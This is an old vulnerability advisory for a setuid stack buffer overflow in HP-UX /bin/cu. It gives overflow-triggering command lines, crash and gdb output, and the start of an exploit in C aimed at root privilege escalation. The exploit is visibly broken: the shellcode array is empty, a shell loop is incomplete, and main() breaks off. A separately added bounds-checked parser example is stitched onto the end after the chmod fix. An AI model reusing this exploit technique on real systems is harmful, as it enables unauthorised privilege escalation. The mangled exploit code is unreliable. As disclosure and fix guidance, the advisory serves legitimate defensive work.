
HP-UX 10.2, 11.0 cu vulnerability



    HP-UX 10.20, 11.00


    'zorgon' found the following (tested on HP-UX B.11.00).

        $ ls -la `which cu`
        -r-sr-xr-x   1 bin          40960  9 avr  1998 /bin/cu

    Using '-l' with a long option string:

        $ cu -l `perl -e 'printf "A" x 9777'`
        La connexion a échoué : Requested device/system name not known

        $ cu -l `perl -e 'printf "A" x 9778'`
        Memory fault

    It's exploitable on 10.20 (trivial exploit: you don't even have to
    find the return address, the buffer itself gets executed). HP-UX 9.x
    68k seems to be vulnerable too. On HP-UX 11 you need PA-RISC 1.1
    shell code, and the PC you get with

        ./cu -l `perl -e 'printf "A" x 5667'`

    changes randomly (why?). Eventually you get a pointer to your

        $ while :
        ./cu -l `perl -e 'printf "A" x 5667'`
        if file core | egrep -v SIGILL

        Illegal instruction(coredump)
        Connect failed: Requested device/system name not known

        Illegal instruction(coredump)
        Memory fault(coredump)
        core:           core file from 'cu' - received SIGSEGV

        $  gdb cu core
        Core was generated by `cu'.
        Program terminated with signal 11, Segmentation fault.
        Unable to find __dld_flags symbol in object file.

        #0  0x7f7eb010 in ?? ()
        (gdb) print {char *} 0x7f7eb010
        $1 = 0x41414141 <Address 0x41414141 out of bounds>

    zorgon has written an exploit for the HP/UX /bin/cu command:

    /* Copyright (c) 2001 Zorgon
     * All Rights Reserved
     * The copyright notice above does not evidence any
     * actual or intended publication of such source code.
     * HP-UX /bin/cu exploit.
     * Tested on HP-UX 11.00
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>     /* strlen */
    #include <sys/types.h>
    #include <unistd.h>
    #define LEN 9778
    #define HPPA_NOP 0x0b390280
    #define RET 0x7f7eb010
    #define OFFSET 1200    /* it works for me */
    u_char hppa_shellcode[] = /* K2 <> shellcode */
    main(int argc , char **argv){
            char buffer[LEN+8];
            int i;
            long retaddr = RET;
            int offset = OFFSET;
            if(argc>1) offset = atoi(argv[1]);
            for (i=0;i<LEN;i+=4)
                    *(long *)&buffer[i] = retaddr + offset;
            for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++)
                    *(buffer+i) = HPPA_NOP;
            fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
            fprintf(stderr, "Copyright (c) 2001 Zorgon\n");
            fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));


    Fix: chmod -s /bin/cu
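Removing the setuid bit closes the privilege path; the underlying defect is an argument copied into a fixed stack buffer without a length check. As an added illustration that is not part of zorgon's advisory or of cu's source, the C below shows the bounded handling a fixed `-l` device-name parser would need; the 255-byte limit, the struct and the function names are assumptions for this example.

```c
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define DEVNAME_MAX 255   /* assumed limit; cu's real limit is not on the page */

struct line_opt {
    char name[DEVNAME_MAX + 1];
};

/* Bounded replacement for a fixed-buffer argv copy: the argument is measured
 * only up to the limit, rejected if empty, too long, or holding characters a
 * device/system name never needs, and copied only after both checks pass.
 * Returns 0 on success, -1 on rejection. */
int parse_line_option(const char *arg, struct line_opt *out)
{
    size_t n = 0;
    if (arg == NULL || out == NULL) return -1;
    while (n <= DEVNAME_MAX && arg[n] != '\0') n++;   /* never scans past limit+1 */
    if (n == 0 || n > DEVNAME_MAX) return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!isalnum(c) && c != '/' && c != '.' && c != '_' && c != '-')
            return -1;
    }
    memcpy(out->name, arg, n);
    out->name[n] = '\0';
    return 0;
}

/* Helper: feed a name of `len` 'A' bytes, mirroring the perl "A" x N probe
 * above; the parser returns an error where cu returned a Memory fault. */
int probe_name_length(size_t len)
{
    struct line_opt opt;
    char *buf = malloc(len + 1);
    int rc;
    if (buf == NULL) return -2;
    memset(buf, 'A', len);
    buf[len] = '\0';
    rc = parse_line_option(buf, &opt);
    free(buf);
    return rc;
}

/* Helper: 1 if `arg` is accepted and stored unchanged, 0 otherwise. */
int accepts_name(const char *arg)
{
    struct line_opt opt;
    return parse_line_option(arg, &opt) == 0 && strcmp(opt.name, arg) == 0;
}
```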
